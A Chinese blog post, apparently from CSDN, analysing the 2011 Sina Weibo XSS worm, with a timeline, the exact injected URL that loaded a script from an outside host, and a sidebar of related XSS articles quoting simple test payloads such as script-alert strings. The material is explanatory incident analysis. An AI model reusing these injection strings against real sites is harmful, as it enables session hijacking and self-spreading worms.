XSS第四节,XSS攻击实例(一)

最新推荐文章于 2023-05-25 20:20:47 发布
最新推荐文章于 2023-05-25 20:20:47 发布
阅读量321 收藏 1
点赞数

在开始实例的讲解之前,先看一下XSS的危害情况,第一张图中说明和XSS相关的CVE漏洞有7417个(http://web.nvd.nist.gov/view/vuln/search-results?query=xss&search_type=all&cves=on),第二张图说明在了乌云漏洞平台(www.wooyun.org)上和XSS相关的漏洞有2360个,足见XSS威力还是很大的。


这次举的例子是2011年6月28日新浪微博XSS攻击事件

事件的经过线索如下:

20:14,开始有大量带V的认证用户中招转发蠕虫
20:30,2kt.cn中的病毒页面无法访问
20:32,新浪微博中hellosamy用户无法访问
21:02,新浪漏洞修补完毕


新浪微博事件是利用了微博广场页面 http://weibo.com/pub/star 的一个URL注入了js脚本,其通过http://163.fm/PxZHoxn 短链接服务,将链接指向:http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update
其中的地址为:< script src="//www.2kt.cn/images/t.js"></script>,下面附一张来自腾讯科技的配图,


当时大多数分析者认为 Chrome 和 Safari 都没中招,IE、Firefox未能幸免。但IE8以后自动开启了XSS防御,所以普通用户使用IE8以上版本和Chrome以及Safari还是能防范普通XSS攻击的。

iteye_10018
关注
[网络安全自学篇] 七十八.XSS跨站脚本攻击案例分享及总结(二)
杨秀璋的专栏
05-18 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了肖老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。这些天分享了很多系统安全和软件安全的知识,接下来让我们回归网络安全,做做XSS跨站脚本攻击案例。这些题目来自Fox好友,在此感谢他。主要内容包括XSS原理、不同类型的XSSXSS靶场9道题目、如何防御XSS。希望您喜欢~
XSS攻击实例1
01-11
简单让你了解xss攻击。 项目基于Asp.net 框架,VS2010下创建,C#语言
一个简单XSS攻击示例及处理
麦芽面包 (源码:咖啡:红茶)
08-28 827
最近项目被第三方工具扫描出来有一个Http head xss cross scripting漏洞,为了修复这个,顺便研究了一下跨站脚本攻击的原理, 跨站脚本攻击基本上就是sql注入的html版, 核心内容就是把一段精心设计的脚本通过网页中的html漏洞由HTTP GET/POST传给服务器并执行. XSS主要有两种,一种是注入的链接需要骗人来点击,目的是劫持用户的cookie; 一种是该脚本已...
10个XSS攻击实例
m0_49521873的博客
05-25 2000
1. Cookie盗窃攻击:攻击者可以通过注入恶意代码,获取用户的 Cookie,并利用 Cookie 进行身份验证,获取用户的敏感信息。4. 注入点击劫持攻击:攻击者可以注入一段代码,将隐藏的按钮伪装成用户需要点击的区域,当用户点击时,实际上在执行一个恶意操作。9. 恶意相片攻击:攻击者可以在从社交媒体网站下载的相片中注入一段代码,当用户查看相片时,代码就会临时运行,窃取用户的信息。8. 恶意广告攻击:攻击者可以在广告中注入一段代码,当用户点击广告时,代码就可以窃取用户的个人信息。
实现 XSS 攻击简单示例
weixin_34128839的博客
06-21 1925
为什么80%的码农都做不了架构师?>>> ...
XSS攻击的一个校内简单实例
热门推荐
YKRY35的博客
11-11 1万+
前言 偷得浮生半日闲。 记一记往事。 大神请绕道。。 写之前打开hackinglab,一年不见,多了个创新关。 脚本关的12-15题是XSS。打开脚本关的XSS瞅了一眼,15关没过。 想起上次啃15关啃了很久啃不出,那时还在高中的图书馆里。此处省略一千字。 时隔若干年,老夫要找个时间再试一试。 这里的攻击对象是学校旧的网络...
第04篇:XSS三重URL编码绕过实例1
08-03
本文主要探讨了一个XSS三重URL编码绕过的实例,揭示了在某些情况下,简单的防御措施可能不足以阻止攻击。 首先,我们要理解XSS的基本概念。XSS攻击通常发生在Web应用程序未能正确过滤或转义用户输入的情况下。当...
第二节 XSS fuzzing 工具-01
最新发布
09-15
4. 开源免费:XSStrike 工具是开源免费的,可以被广泛用于检测和修复 XSS 漏洞。 XSStrike 工具的缺点包括: 1. 需要 Python 3.6 以上版本:XSStrike 工具需要 Python 3.6 以上版本,可能会对一些老版本的 Python ...
ThinkPHP2.x防范XSS跨站攻击的方法
10-23
XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的网络安全问题,它允许攻击者在用户浏览器上执行恶意脚本。在ThinkPHP2.x框架中,由于框架本身可能存在一些安全漏洞,使得XSS攻击成为可能。下面我们将深入探讨...
PHP和XSS跨站攻击的防范
10-30
#### 三、XSS攻击实例 在实际应用中,许多PHP网站由于未正确处理用户输入的数据而容易受到XSS攻击。例如,Discuz论坛系统曾曝出XSS漏洞,攻击者可以通过特定的输入数据在论坛页面中注入恶意脚本。此类攻击往往利用...
web安全之XSS攻击demo
04-18
web安全之XSS攻击demo,配合我个人博客使用,谢谢各位的捧场
XSS攻击 代码演示
05-13
网站xss 攻击 代码示例,包括alert弹框,钓鱼网站截取用户cookie信息等;是学习xss的简单示例。可以下载玩玩看看,示例中的钓鱼网站地址为 演示地址,即本资源中的项目地址。xss也是很简单的,可以学习学习
各类花里胡哨的XSS攻击举例解读(正在持续更新中~)
WalterBailey's Blog
04-24 2672
文章目录XSS攻击XSS Payload“Cookie劫持”攻击更为强大XSS Payload构造GET和POST请求GET请求POST请求通过XSS Payload读取QMail用户的邮件文件夹XSS钓鱼识别用户浏览器通过XSS读取浏览器的UserAgent对象:另一种方法识别用户安装的软件 XSS攻击 XSS Payload XSS攻击成功后,攻击者能够对用户当前浏览的页面植入恶意脚本,通过...
XSS攻击简单实例
绝圣弃智-零的博客
03-25 4119
下面演示一个简单的留言板攻击实例 我们有个页面用于允许用户发表留言,然后在页面底部显示留言列表 前端代码如下: <!DOCTYPE html><html><head> <?php include('/components/headerinclude.php');?></head> <style type=...
xss攻击实例
frinck的博客
10-16 5064
Cross Site Script 攻击者利用应用程序的动态展示数据功能,在 html 页面里嵌入恶意代码。当用户浏览该页之时,这些嵌入在 html 中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的。 1.分类 ????反射型跨站脚本攻击 攻击者会通过社会工程学手段,发送一个 URL 连接给用户打开,在用户打开页面的同时,浏览器会执行页面中嵌入的恶意脚本。 ✨存储型跨站脚本攻...
XSS攻击实例分析
mdp1234的博客
07-29 4514
例1、简单XSS攻击 留言类,简单注入javascript 万能测试XSS漏洞代码:"/></textarea><script>alert(1)</script> 有个表单域:<input type=“text” name=“content” value=“这里是用户填写的数据”> 1、假若用户填写数据为:<script>alert('foolish!')</script>(或者<script type=..
XSS例子
技术资料库
10-19 6187
Note from the author: XSS is Cross Site Scripting. If you dont know how XSS (Cross Site Scripting) works, this page probably wont help you. This page is for people who
xss攻击简单实例
weixin_33997389的博客
12-02 535
2019独角兽企业重金招聘Python工程师标准>>> ...
(二)XSS实例
weixin_43047908的博客
04-10 1042
Reflected XSS Reflected XSS into HTML context with nothing encoded 构造攻击脚本:<script>alert(1)</script> 将该脚本输入到搜索框中 Reflected XSS into HTML context with most tags and attributes blocked 在搜索功能中包含反射型跨站点脚本漏洞,但是使用了Web应用程序防火墙(WAF)来防御常见的XSS向量。 构造payload
Android开发权威指南第二版:XSS安全分析
"《上面的变体-android开发权威指南 第二版》是关于Android开发的一本书,但这里讨论的内容侧重于网络安全,特别是XSS(跨站脚本攻击)的实例和防范。书中通过一系列的代码示例展示了XSS的各种类型和应用场景,包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值